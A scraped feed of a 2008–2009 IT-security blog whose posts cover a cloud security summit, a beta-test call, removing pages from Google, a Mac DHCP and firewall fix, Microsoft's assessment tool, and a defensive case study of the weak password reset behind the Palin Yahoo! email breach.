greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Cloud Security summit offered free on September 30th http://www.greghughes.net/rant/PermaLink,guid,06dfce3e-a546-4543-9fae-4af4cd622891.aspx http://www.greghughes.net/rant/CloudSecuritySummitOfferedFreeOnSeptember30th.aspx Sat, 26 Sep 2009 00:36:42 GMT <p> One of the upcoming online summits at BrightTalk is the Cloud Security Summit, which consists of a bunch of web conferences on September 30th. </p> <p> You can <a href="http://www.brighttalk.com/summit/cloudsecurity" title="" target="_blank">visit the summit overview and schedule page here</a>. </p> <p> Lots of topics around security, legal issues and compliance in the context of cloud computing. Good stuff. Recently on RunAs Radio we have have had a couple discussions where cloud computing came up, too. </p> <p> <ul> <li> RunAs Radio #126: <a href="http://runasradio.com/default.aspx?showNum=126">Steve Riley is Up in the Clouds</a> </li> <li> RunAs Radio #123: <a href="http://runasradio.com/default.aspx?showNum=123" title="">Andy Malone Battles Security in the Clouds</a> </li> </ul> > <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,06dfce3e-a546-4543-9fae-4af4cd622891.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=8fef5eab-8032-473a-a6e0-497cac608347 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,8fef5eab-8032-473a-a6e0-497cac608347.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=8fef5eab-8032-473a-a6e0-497cac608347 1

UPDATE: We've had a great response and have assigned all of our beta invitations for the first round of testing, but please check the details below and let me know if you think you'd be able to help in a future phase!

I'm working with a software company to test some cool software that's currently in the early beta stage of development. The software is of a security nature and will be of interest to IT and security folks as well as individual computer users. We're looking for people with netbooks and notebook computers, especially ones with webcams built in, to test the software and provide feedback.

You'll be provided a test key and the beta software, and will need to honor the confidentiality provisions of the test program. It's nothing too complicated and the test risks are very small. You'll install the software, run through a few operational tests and let us know the results. We will ask first for technical results ("Did this work?") as well as your opinions and thoughts, should you wish to provide them.

What you'll need to provide and have available for the test:

  • One or more notebook or netbook computers
  • Computer(s) must be running Windows XP, Vista or Windows 7
  • If it has a webcam built in, all the better (but not required)
  • A Flickr account (basic account is fine)
  • An email account and server information (for application configuration to allow sending of email alerts)

What you'll get as a result of testing and providing feedback:

  • A free copy of the release version of the software when it's released (and you'll be glad you have it installed if your computer is ever lost or stolen, hint hint)
  • Satisfaction and a sincere thank-you from me and the developers of the software

This software is quite interesting and has a lot of promise to provide real security value when it hits the streets, so we want to find as many complete test cases as we can. If you're interested, please email me at greg@greghughes.net and provide the details about your system, OS, etc - or call me at 503-766-2258. We are testing now, so let me know!

And thanks!



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Beta test opportunity: Help us test a cool security application for notebooks http://www.greghughes.net/rant/PermaLink,guid,8fef5eab-8032-473a-a6e0-497cac608347.aspx http://www.greghughes.net/rant/BetaTestOpportunityHelpUsTestACoolSecurityApplicationForNotebooks.aspx Tue, 24 Mar 2009 01:26:09 GMT <p> <i><b>UPDATE: </b>We've had a great response and have assigned all of our beta invitations for the first round of testing, but please check the details below and let me know if you think you'd be able to help in a future phase!</i> </p> <p> I'm working with a software company to test some cool software that's currently in the early beta stage of development. The software is of a security nature and will be of interest to IT and security folks as well as individual computer users. We're looking for people with <strong>netbooks</strong> and <strong>notebook computers</strong>, especially ones with <strong>webcams</strong> built in, to test the software and provide feedback. </p> <p> You'll be provided a test key and the beta software, and will need to honor the confidentiality provisions of the test program. It's nothing too complicated and the test risks are very small. You'll install the software, run through a few operational tests and let us know the results. We will ask first for technical results ("Did this work?") as well as your opinions and thoughts, should you wish to provide them. </p> <p> What you'll need to provide and have available for the test: </p> <ul> <li> One or more notebook or netbook computers</li> <li> Computer(s) must be running Windows XP, Vista or Windows 7</li> <li> If it has a webcam built in, all the better (but not required)</li> <li> A Flickr account (basic account is fine)</li> <li> An email account and server information (for application configuration to allow sending of email alerts)</li> </ul> <p> What you'll get as a result of testing and providing feedback: </p> <ul> <li> A free copy of the release version of the software when it's released (and you'll be glad you have it installed if your computer is ever lost or stolen, <em>hint hint</em>)</li> <li> Satisfaction and a sincere thank-you from me and the developers of the software</li> </ul> <p> This software is quite interesting and has a lot of promise to provide real security value when it hits the streets, so we want to find as many complete test cases as we can. If you're interested, please email me at greg@greghughes.net and provide the details about your system, OS, etc - or call me at 503-766-2258. We are testing now, so let me know! </p> <p> And thanks! </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,8fef5eab-8032-473a-a6e0-497cac608347.aspx Geek Out IT Security Safe Computing Tech Windows
http://www.greghughes.net/rant/Trackback.aspx?guid=20aae481-0169-4bcc-bb05-0983a74c2803 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,20aae481-0169-4bcc-bb05-0983a74c2803.aspx http://www.greghughes.net/rant/CommentView,guid,20aae481-0169-4bcc-bb05-0983a74c2803.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=20aae481-0169-4bcc-bb05-0983a74c2803 10

More than once someone has asked me if there is a way to get Google to change their search results to exclude mean, inaccurate, defamatory, rude, or otherwise hard-to-swallow web pages. Often the desire motivating the question is legitimate, as someone has been smeared unfairly or - even worse - in a completely fabricated and malicious fashion, sometimes by anonymous online personalities.

The short answer is, "Probably not."

Now, before you think the proper solution is to have Google block the pages from their search results, it's important to understand that Google is not the Internet, and that it's not really making recommendations to you when it lists web pages that match what you're looking for. Rather, it's showing you an extensive list of links to content out there on the Internet that seems to match what you're looking for.

And that's what Google's search engine is: A way to find information created by other people and displayed on the Internet. It's not a filter that's meant to decide good from bad, who's right and who's wrong, who's lying or telling the truth, etc.

That said, there are things that Google works hard to avoid showing you. Spammy pages (especially ones that try to game Google's own advertising systems) are filtered out, and there are a couple topics that won't return results in their adsense and adwords advertising systems (just try to set up adsense on a site that sells or promoted firearms, for example). So they're not completely hands off, but for the most part they don't discriminate.

When you want to have a web page removed from the search listings at Google, the most effective (and almost the only) way to do so is to convince the person controlling the web page to change the information or remove it. If you can't get them to do that, it might be time to go to a court - assuming you have convincing proof that the page is inaccurate and/or malicious, etc.

Granted, if a judge sends Google a legal notice requiring them to take action, they'll probably do so. But good luck getting a judge to agree to do that.

Always go after the source of the problem. It's not Google's fault that some mean person posted a page that says you're a jerk and thief (even though you're not). But you might be able to convince a judge that the person you claim is defaming you should change or remove the page. If that happens, Google's indexing bots will automatically update the search results the net time they crawl the offending pages and see the content has changed.

Matt Cutts has a good article (with a great graphic) discussing this. Here's a brief excerpt of what Matt tells people when they ask him the same question:

We really don’t want to be taking sides in a he-said/she-said dispute, so that’s why we typically say “Get the page fixed, changed, or removed on the web and then Google will update our index with those changes the next time that we crawl that page.”

His post prompted me to think about this again since I get this type of question several times a year. Just keep in mind that while it's an emotionally difficult thing to have someone write mean things and lies about you for all to see, it's a relatively clinical process to try to get that information changed or removed. Just make sure you stay calm and look to the right people to help with driving those changes.

Google's official page that addresses how to remove content from the company's search results is located at:

http://www.google.com/support/webmasters/bin/answer.py?answer=136868



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Can you get a web page removed from Google search results? http://www.greghughes.net/rant/PermaLink,guid,20aae481-0169-4bcc-bb05-0983a74c2803.aspx http://www.greghughes.net/rant/CanYouGetAWebPageRemovedFromGoogleSearchResults.aspx Wed, 04 Mar 2009 15:12:27 GMT <p> More than once someone has asked me if there is a way to get Google to change their search results to exclude mean, inaccurate, defamatory, rude, or otherwise hard-to-swallow web pages. Often the desire motivating the question is legitimate, as someone has been smeared unfairly or - even worse - in a completely fabricated and malicious fashion, sometimes by anonymous online personalities. </p> <p> The short answer is, "Probably not." </p> <p> Now, before you think the proper solution is to have Google block the pages from their search results, it's important to understand that Google is not the Internet, and that it's not really making recommendations to you when it lists web pages that match what you're looking for. Rather, it's showing you an extensive list of <em>links</em> to <em>content</em> out there on the Internet that seems to match what you're looking for. </p> <p> And that's what Google's search engine is: A way to find information created by other people and displayed on the Internet. It's not a filter that's meant to decide good from bad, who's right and who's wrong, who's lying or telling the truth, etc. </p> <p> That said, there are things that Google works hard to avoid showing you. Spammy pages (especially ones that try to game Google's own advertising systems) are filtered out, and there are a couple topics that won't return results in their adsense and adwords advertising systems (just try to set up adsense on a site that sells or promoted firearms, for example). So they're not completely hands off, but for the most part they don't discriminate. </p> <p> When you want to have a web page removed from the search listings at Google, the most effective (and almost the only) way to do so is to <em>convince the person controlling the web page to change the information or remove it</em>. If you can't get them to do that, it might be time to go to a court - assuming you have convincing proof that the page is inaccurate and/or malicious, etc. </p> <p> Granted, if a judge sends Google a legal notice requiring them to take action, they'll probably do so. But good luck getting a judge to agree to do that. </p> <p> Always go after the <em>source</em> of the problem. It's not Google's fault that some mean person posted a page that says you're a jerk and thief (even though you're not). But you might be able to convince a judge that the person you claim is defaming you should change or remove the page. If that happens, Google's indexing bots will automatically update the search results the net time they crawl the offending pages and see the content has changed. </p> <p> Matt Cutts has <a href="http://www.mattcutts.com/blog/remove-page-from-google/" target="_blank">a good article</a> (with a great graphic) discussing this. Here's a brief excerpt of what Matt tells people when they ask him the same question: </p> <blockquote> <p> We really don’t want to be taking sides in a he-said/she-said dispute, so that’s why we typically say “Get the page fixed, changed, or removed on the web and then Google will update our index with those changes the next time that we crawl that page.” </p> </blockquote> <p> His post prompted me to think about this again since I get this type of question several times a year. Just keep in mind that while it's an emotionally difficult thing to have someone write mean things and lies about you for all to see, it's a relatively clinical process to try to get that information changed or removed. Just make sure you stay calm and look to the right people to help with driving those changes. </p> <p> Google's official page that addresses how to remove content from the company's search results is located at: </p> <p> <a href="http://www.google.com/support/webmasters/bin/answer.py?answer=136868" target="_blank">http://www.google.com/support/webmasters/bin/answer.py?answer=136868</a> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,20aae481-0169-4bcc-bb05-0983a74c2803.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=f539fb2c-3099-49c6-9e45-11f9bd8a19ce http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,f539fb2c-3099-49c6-9e45-11f9bd8a19ce.aspx http://www.greghughes.net/rant/CommentView,guid,f539fb2c-3099-49c6-9e45-11f9bd8a19ce.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=f539fb2c-3099-49c6-9e45-11f9bd8a19ce 18 Mac DHCP wireless connection broken with self-assigned IP address (with solution) http://www.greghughes.net/rant/PermaLink,guid,f539fb2c-3099-49c6-9e45-11f9bd8a19ce.aspx http://www.greghughes.net/rant/MacDHCPWirelessConnectionBrokenWithSelfassignedIPAddressWithSolution.aspx Mon, 09 Feb 2009 08:04:44 GMT <p> I dropped into a Starbucks this afternoon, all prepared to get some emails written and to get some work done between my Sunday afternoon and evening commitments. Everything was fresh in my mind and ready to go via the keyboard and onto the screen. I fetched my grande two-pump sugar-free vanilla skinny latte and sat down in the chair, opened the laptop and watched it wake up and connect to the AT&T wireless access point. </p> <p> But much to my dismay nothing would load over the network. The AirPort icon in the status bar showed the name of the network and indicated that I was connected to the access point, but I had no connection to the Internet. </p> <p> After a brief bit of trying over and over to load a web page, I checked the network preferences in the apple system preferences panel and found that I was not getting an IP address. The Mac was self-assigning a 169.* address, which is a non-routable local-only address. I tried restarting the AirPort card in the Mac, but that didn't help. I then found I was able to connect normally with my iPhone to the AT&T WiFi network and get a "real" IP address (192.x), so I quickly deduced that something was wrong with my Mac. </p> <p> I had to give up on troubleshooting and head back out into the world, but I spent the rest of the day wondering if maybe there was something about the MAC address for my wireless card that AT&T had chosen to hate. After finishing my day of activities, I drove home this evening and fired my laptop back up. It connected to my home wireless network. But again, no IP address assigned. Hmm, definitely the laptop. </p> <p> I started thinking now. What could be happening? Powering the AirPort on and off, shutting down the Mac and powering it back up, manually telling the network stack to renew it's DHCP lease - all these things did no good. </p> <p> I finally decided to take a look at the Mac firewall logs. You'd think that would be the first place I'd look, being a security guy. They're kind of hidden in plain sight, a few layers deep in the Mac's preferences dialogs. You go to the System Preferences panel, in the Security section, then the Firewall tab, then click the Advanced button, and finally click the Open Log button. If logging isn't already turned on, you can enable it there, as well. </p> <p> Sure enough, I looked in the log and found several examples of this (emphasis mine): </p> <blockquote> <p> <em>Feb 8 23:02:04 greg-hughess-macbook-air Firewall[39]: <strong>Deny configd data in</strong> from 192.168.0.1:67 uid = 0 proto=17<br /> Feb 8 23:02:26: --- last message repeated 2 times ---</em> </p> </blockquote> <p> Ah hah... Apparently the firewall was refusing inbound connections initiated by the router as it tried to set up the DHCP address being requested by the laptop. The <a href="http://developer.apple.com/documentation/Darwin/Reference/Manpages/man8/configd.8.html" target="_blank">configd daemon</a> is a service that handles configuration changes for various pieces of the system, mostly all network-related. Great, I had something to fix! </p> <p> I first confirmed configd was in fact running, then deleted the firewall configuration file (located at /Library/Preferences/com.apple.alf.plist) and configured the firewall to temporarily allow all connections, and then back to allowing essential services. Sure enough, as soon as I made the changes the Mac was able to get a DHCP address from the router, and the network was back up and working. </p> <p> I have no real idea how the firewall got messed up. At one point I had it set to configure access for specific services and apps, so that might have had something to do with it. But it's strange that this problem only started today. It's possible the configd process was denied by a rule, I suppose. Perhaps I hit a key on a pop-up dialog to deny firewall access to the daemon without even realizing it while typing? </p> <p> At any rate, it seems to be working now (as evidenced by the fact that I am able to post this blog entry, of course) and hopefully it will continue to work as expected. Maybe this will help someone else troubleshoot a similar issue. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,f539fb2c-3099-49c6-9e45-11f9bd8a19ce.aspx Apple IT Security Tech http://www.greghughes.net/rant/Trackback.aspx?guid=eba8bad8-1993-49a7-afeb-0b099aa1b22e http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,eba8bad8-1993-49a7-afeb-0b099aa1b22e.aspx http://www.greghughes.net/rant/CommentView,guid,eba8bad8-1993-49a7-afeb-0b099aa1b22e.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=eba8bad8-1993-49a7-afeb-0b099aa1b22e

While at the TechEd EMEA conference is Spain this week, I had the opportunity to visit with Thomas Dawkins from Microsoft's Trustworthy Computing Group. He's the guy responsible for the Microsoft Security Assessment Tool (or MSAT for short). The MSAT is a tool that's been around for a couple of years, but it was recently updated by Thomas with some great new enhancements, including a new user interface and a stronger, more complete set of back end information.

MSAT is a free tool that you can download from Microsoft. It's targeted to companies of 1,500 employees or smaller (as a general rule) and follows a questionnaire format to assess weaknesses in the IT security environment. Bt it's not a parching tool or a scanning tool. Instead, it leverages standards like ISO 27001 and NIST-800.x to baseline the security readiness of your organization.

It enables people to do what we security professionals hope for: analysis across each of the people, process and technology elements of a business' computing environment in order to ascertain how and where we need to spend our time and energy. The tool not only describes the state of readiness of the assessed environment, it also provides best-practice recommendations rooted in industry-accepted standards that can be used to improve the organization's security stance.

One of the most likely users of a tool like this is the IT manager, but one can also picture security consultants, business managers, and anyone else with responsibility for an organization's security operations leveraging the tool and the reports it generates.

You'll also likely be interested to know that Microsoft has released the fifth version of its Security Intelligence Report, which looks at the state of computer and information security over the past six months. You can find links to the full report and the key findings summary documents on Microsoft's web site.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Microsoft's Security Assessment Tool - Check your organization's security stance http://www.greghughes.net/rant/PermaLink,guid,eba8bad8-1993-49a7-afeb-0b099aa1b22e.aspx http://www.greghughes.net/rant/MicrosoftsSecurityAssessmentToolCheckYourOrganizationsSecurityStance.aspx Fri, 07 Nov 2008 15:01:17 GMT <p style="clear: both;"> While at the TechEd EMEA conference is Spain this week, I had the opportunity to visit with Thomas Dawkins from Microsoft's Trustworthy Computing Group. He's the guy responsible for <a href="http://go.microsoft.com/?LinkID=4378891" target="_blank">the Microsoft Security Assessment Tool</a> (or MSAT for short). The MSAT is a tool that's been around for a couple of years, but it was recently updated by Thomas with some great new enhancements, including a new user interface and a stronger, more complete set of back end information. </p> <p style="clear: both;"> MSAT is a free tool that you can download from Microsoft. It's targeted to companies of 1,500 employees or smaller (as a general rule) and follows a questionnaire format to assess weaknesses in the IT security environment. Bt it's not a parching tool or a scanning tool. Instead, it leverages standards like ISO 27001 and NIST-800.x to baseline the security readiness of your organization. </p> <p style="clear: both;"> It enables people to do what we security professionals hope for: analysis across each of the people, process and technology elements of a business' computing environment in order to ascertain how and where we need to spend our time and energy. The tool not only describes the state of readiness of the assessed environment, it also provides best-practice recommendations rooted in industry-accepted standards that can be used to improve the organization's security stance. </p> <p style="clear: both;"> One of the most likely users of a tool like this is the IT manager, but one can also picture security consultants, business managers, and anyone else with responsibility for an organization's security operations leveraging the tool and the reports it generates. </p> <p style="clear: both;"> You'll also likely be interested to know that Microsoft has released the fifth version of its <a href="http://go.microsoft.com/fwlink/?LinkId=131912" target="_blank">Security Intelligence Report</a>, which looks at the state of computer and information security over the past six months. You can find links to the full report and the key findings summary documents <a href="http://go.microsoft.com/fwlink/?LinkId=131912" target="_blank">on Microsoft's web site</a>. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,eba8bad8-1993-49a7-afeb-0b099aa1b22e.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=b4ec40c9-c6f2-47e9-bb2b-d4e3f15fc5ac http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,b4ec40c9-c6f2-47e9-bb2b-d4e3f15fc5ac.aspx http://www.greghughes.net/rant/CommentView,guid,b4ec40c9-c6f2-47e9-bb2b-d4e3f15fc5ac.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=b4ec40c9-c6f2-47e9-bb2b-d4e3f15fc5ac 4

It's really the classic case study in information (in)security and the need for strong authentication. With all due respect to the good people at Yahoo!, this opportunity to review Internet security mechanisms is too good and too useful to pass up.

By now, we all know Republican vice-presidential candidate Sarah Palin's Yahoo! email account was broken into on Tuesday night (read the link to get the details). Apparently (and fairly obviously), access was gained via the forgotten password mechanism on the Yahoo! webmail interface, which allowed the malicious person to reset the profile's password with just a few pieces of information about the Alaska governor (birthdate, ZIP code and a piece of info related to where she met her spouse) that could be easily discovered by searching Google. That fact that so much of Palin's life history has been documented on the Web makes her that much more vulnerable to knowledge-based security mechanism hacks. It should also be noted that some security questions are better (or stronger) than others, so it's important that questions you choose for online protection are not ones that can be answered with information available on the Internet.

We security folk frequently talk about something called "multifactor authentication." By "multifactor" we mean an authentication process that requires two or more of the following:

  • Something you know (passwords, user names, answers to questions)
  • Something you have (token, device, phone, etc.)
  • Something you are (physical fingerprint, voiceprint, or other biometric measure such as a verifiable, non-spoofable behavior (some call this "something you do"))

Most multifactor auth systems are pretty easy to recognize. You know them when you see them. Those key fobs or cards with the revolving digits that you have to provide at login are a common example. They're also fairly expensive and complicated. Some multifactor technologies are easier to use than others. There are a variety of behind-the scenes systems that track user behavior and other markers to determine if the person accessing an account is the legitimate user or a bad guy, for example. A well-designed and well-implemented system balances usability with security strength, and some systems yield higher results in that regard than others.

In this particular case, the bad guy was able to leverage only things he knew (found via a search engine) to change the password on the account and gain access to the Yahoo! Mail account. No other verification or mechanism was required. That's simply weak security in this day and age.

I walked through the account password reset system on my Yahoo! account, just so I could get a first-hand look at how it works and how simple it is to reset an account there. Honestly, it was a little too easy. Here are the details (you can click each image to see them full-size):

First of all, I selected the option on the login screen that says, "Forgot your ID or password?"


Next I was prompted either to supply an email address for reset, or to choose the option to reset without access to a registered email account (which to me was an immediate red flag). Obviously, I chose the latter.


This is where the security mechanism breaks down. I'm immediately asked to answer a "secret" security question. This process is called knowledge-based authentication. It's an additional layer of validation in a single-factor authentication scheme - I have to provide "something else I know." Even in my case it's information that could be fairly easily discovered (assuming I answered the question accurately). It should also be noted that in order to change my security question, I need to contact Yahoo! customer support (which I did).


Once I supply the correct answer to a single question, I'm immediately allowed to change my password. At this point it should be noted that if I was prompted to answer multiple questions in this validation workflow, using some randomization of questions and setting a time limit to answer each one, that would at least make it more difficult for someone to gain unauthorized access. Systems are available to do exactly that (I know, I used to manage a team that built one such authentication app).


I'm asked to verify my ZIP code and country (just for profile information), and that's it. Note that other analyses of this process seemed to say that providing the ZIP code and Country was required to reset, but that was not the case in my review. In fact, it appears the bad guy is just being handed that information after changing the password, for free. Take that info, stick it in your Google and smoke it: More search accuracy for the next phase in your attack. Not good.


I'm then notified that my account is now "up to date." I also got an email notifying me of the changes that were made to an account I had tied to the Yahoo! profile for communication purposes. At least I can rest assured that I'll get an email before the bad guy goes into my profile and removes that address from the account.


I think you're starting to get the picture. The authentication mechanism is only as strong as it's weakest part, and the fact that I have an option to reset without ever having to leave the browser window is a problem. Even changing the system to require that I receive an email (which is already the standard reset mechanism) would be better. As it stands today, that's an option, but not a requirement.

Many will argue that hey, it's just an email account, and that Yahoo! can't be expected to implement stronger security on their site as a requirement. I say that's flat out wrong (and what the account was or wasn't used for isn't particularly relevant to this analysis). Email is the number one mechanism used to move information - both innocuous and sensitive - among people. The fact that it's not the best mechanism for doing so ignores the fact that it's how people do things. There are a variety of options available to help ensure only authorized users can get access to email accounts. The fact they are not regularly implemented is a sad state of affairs.

There are many options to strengthen the identification and authentication processes. We can't discuss them all here, but a couple on my mind are described below.

Physical tokens - Making the jump from only having to remember a user name (which is usually the email address, so hardly a secret ) and a password to a scheme where one must carry a token and provide information from it in order to log in is quite a leap (carrying yet another piece of technology around doesn't exactly appeal to me), but it works. The costs associated with fulfilling, supporting and maintaining such a system are very real, and for Yahoo! may not be realistic. But there are systems available to those who know and choose to use them that can substially improve your authentication profile. Check out Omar Shahine's recent blog entry describing how he's securing his accounts in a few ways, including with an OpenID-integrated single-sign-on token system from Verisign.

But, even if you use an OpenID to sign in, what if your OpenID is a Yahoo! ID or other identity that you can reset with a single piece of discoverable knowledge? It still needs to be protected from unauthorized changes and access.

How to do that? There are several ways. I have a couple of favorites, but please feel free to share yours.

Require security changes to take place out of band - One option, probably quicker and less expensive to implement than physical tokens, is using something like an automated telephone call or text message to require the owner of the account to verify a change should be allowed. By registering one or more phone numbers when the account is created and requiring a unique secret be provided via that channel to authorize a change, one can sufficiently secure the account. Vidoop uses a system like this for resetting information on their OpenID accounts. It's simple and it works. It requires me to have the correct device (my phone), uses a different communication channel (the phone network, hence "out-of-band") to contact me and then verifies I am a legitimate user. It requires me to interact as part of any change.

But the technology options get even better: JanRain's myOpenID, for example, now has a feature called "CallVerfID" that equips your myOpenID for two-factor authentication via the phone. It's quick and easy to set up and instantly protects every login with a multifactor authentication mechanism. I found I was not able to use it with a couple phone services due to the way they answer the call (I should provide feedback about that, added to my to-do list), but when set up for my cell or home phone it works as advertised.

Expect more of this class of technology in the future. Think, for example, about voice biometrics: Is that really you that's answering your phone? That kind of technology would be very cool if it was reliable. It's a complicated but useful technology that's being refined even as we discuss this.

I would guess that "review of all Internet email accounts" has been added to every campaign manager's list of things to do deal with early in the vetting process (not to mention the Secret Service's list). Any of the technologies above would likely have prevented the malicious bad guy from accessing the Yahoo! email account.

In the security world, change only happens when enough people make enough noise, a regulator gives an order, or enough companies feel enough financial pain. This looks like one of those cases where noise is the better option. It's certainly better than regulatory mandates (which tend to create collateral damage), and waiting on big companies to suffer is not exactly a reliable plan.

So... Feeling okay? How safe is your account, really?



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. A case study in poor authentication: Palin's Yahoo! email account http://www.greghughes.net/rant/PermaLink,guid,b4ec40c9-c6f2-47e9-bb2b-d4e3f15fc5ac.aspx http://www.greghughes.net/rant/ACaseStudyInPoorAuthenticationPalinsYahooEmailAccount.aspx Fri, 19 Sep 2008 03:26:05 GMT <p style="clear: both"> <i>It's really the classic case study in information (in)security and the need for strong authentication. With all due respect to the good people at Yahoo!, this opportunity to review Internet security mechanisms is too good and too useful to pass up.</i> <br /> </p> <p style="clear: both"> By now, we all know Republican vice-presidential candidate <a href="http://blog.wired.com/27bstroke6/2008/09/palin-e-mail-ha.html" title="" target="_blank">Sarah Palin's Yahoo! email account was broken into</a> on Tuesday night (read the link to get the details). Apparently (and fairly obviously), access was gained via the forgotten password mechanism on the Yahoo! webmail interface, which allowed the malicious person to reset the profile's password with just a few pieces of information about the Alaska governor (birthdate, ZIP code and a piece of info related to where she met her spouse) that could be easily discovered by searching Google. That fact that so much of Palin's life history has been documented on the Web makes her that much more vulnerable to knowledge-based security mechanism hacks. It should also be noted that some security questions are better (or stronger) than others, so it's important that questions you choose for online protection are not ones that can be answered with information available on the Internet.<br /> </p> <p style="clear: both"> We security folk frequently talk about something called "multifactor authentication." By "multifactor" we mean an authentication process that requires two or more of the following:<br /> </p> <p style="clear: both"> <ul> <li> Something you know (passwords, user names, answers to questions)</li> <li> Something you have (token, device, phone, etc.)</li> <li> Something you are (physical fingerprint, voiceprint, or other biometric measure such as a verifiable, non-spoofable behavior (some call this "something you do"))</li> </ul> > <p style="clear: both"> Most multifactor auth systems are pretty easy to recognize. You know them when you see them. Those key fobs or cards with the revolving digits that you have to provide at login are a common example. They're also fairly expensive and complicated. Some multifactor technologies are easier to use than others. There are a variety of behind-the scenes systems that track user behavior and other markers to determine if the person accessing an account is the legitimate user or a bad guy, for example. A well-designed and well-implemented system balances usability with security strength, and some systems yield higher results in that regard than others.<br /> </p> <p style="clear: both"> In this particular case, the bad guy was able to leverage only things he knew (found via a search engine) to change the password on the account and gain access to the Yahoo! Mail account. No other verification or mechanism was required. That's simply weak security in this day and age. </p> <p style="clear: both"> I walked through the account password reset system on my Yahoo! account, just so I could get a first-hand look at how it works and how simple it is to reset an account there. Honestly, it was a little too easy. Here are the details (you can click each image to see them full-size):<br /> </p> <p style="clear: both"> First of all, I selected the option on the login screen that says, "Forgot your ID or password?"<br /> </p> <p style="clear: both"> <a href="http://www.greghughes.net/rant/content/binary/yscreen-capture2.png"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/yscreen-capture4.png" height="431" width="256" style=" text-align: center; display: block; margin: 0 auto 0;" /></a> <br style="clear: both" /> Next I was prompted either to supply an email address for reset, or to choose the option to reset without access to a registered email account (which to me was an immediate red flag). Obviously, I chose the latter.<br /> </p> <p style="clear: both"> <a href="http://www.greghughes.net/rant/content/binary/yscreen-capture-13.png"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/yscreen-capture-19.png" height="122" width="380" style=" text-align: center; display: block; margin: 0 auto 0;" /></a> <br style="clear: both" /> This is where the security mechanism breaks down. I'm immediately asked to answer a "secret" security question. This process is called knowledge-based authentication. It's an additional layer of validation in a single-factor authentication scheme - I have to provide "something else I know." Even in my case it's information that could be fairly easily discovered (assuming I answered the question accurately). It should also be noted that in order to change my security question, I need to contact Yahoo! customer support (which I did).<br /> </p> <p style="clear: both"> <a href="http://www.greghughes.net/rant/content/binary/yscreen-capture-12.png"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/yscreen-capture-14.png" height="159" width="380" style=" text-align: center; display: block; margin: 0 auto 0;" /></a> <br style="clear: both" /> Once I supply the correct answer to a single question, I'm immediately allowed to change my password. At this point it should be noted that if I was prompted to answer multiple questions in this validation workflow, using some randomization of questions and setting a time limit to answer each one, that would at least make it more difficult for someone to gain unauthorized access. Systems are available to do exactly that (I know, I used to manage a team that built one such authentication app).<br /> </p> <p style="clear: both"> <a href="http://www.greghughes.net/rant/content/binary/yscreen-capture-9.png"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/yscreen-capture-20.png" height="124" width="380" style=" text-align: center; display: block; margin: 0 auto 0;" /></a> <br style="clear: both" /> I'm asked to verify my ZIP code and country (just for profile information), and that's it. Note that other analyses of this process seemed to say that providing the ZIP code and Country was required to reset, but that was not the case in my review. In fact, it appears the bad guy is just being handed that information after changing the password, for free. Take that info, stick it in your Google and smoke it: More search accuracy for the next phase in your attack. Not good.<br /> </p> <p style="clear: both"> <a href="http://www.greghughes.net/rant/content/binary/yscreen-capture-10.png"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/yscreen-capture-21.png" height="142" width="380" style=" text-align: center; display: block; margin: 0 auto 0;" /></a> <br style="clear: both" /> I'm then notified that my account is now "up to date." I also got an email notifying me of the changes that were made to an account I had tied to the Yahoo! profile for communication purposes. At least I can rest assured that I'll get an email before the bad guy goes into my profile and removes that address from the account.<br /> </p> <p style="clear: both"> <a href="http://www.greghughes.net/rant/content/binary/yscreen-capture-14.png"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/yscreen-capture-23.png" height="224" width="380" style=" text-align: center; display: block; margin: 0 auto 0;" /></a> <br style="clear: both" /> I think you're starting to get the picture. The authentication mechanism is only as strong as it's weakest part, and the fact that I have an option to reset without ever having to leave the browser window is a problem. Even changing the system to require that I receive an email (which is already the standard reset mechanism) would be better. As it stands today, that's an option, but not a requirement. </p> <p style="clear: both"> Many will argue that hey, it's just an email account, and that Yahoo! can't be expected to implement stronger security on their site as a requirement. I say that's flat out wrong (and what the account was or wasn't used for isn't particularly relevant to this analysis). Email is the number one mechanism used to move information - 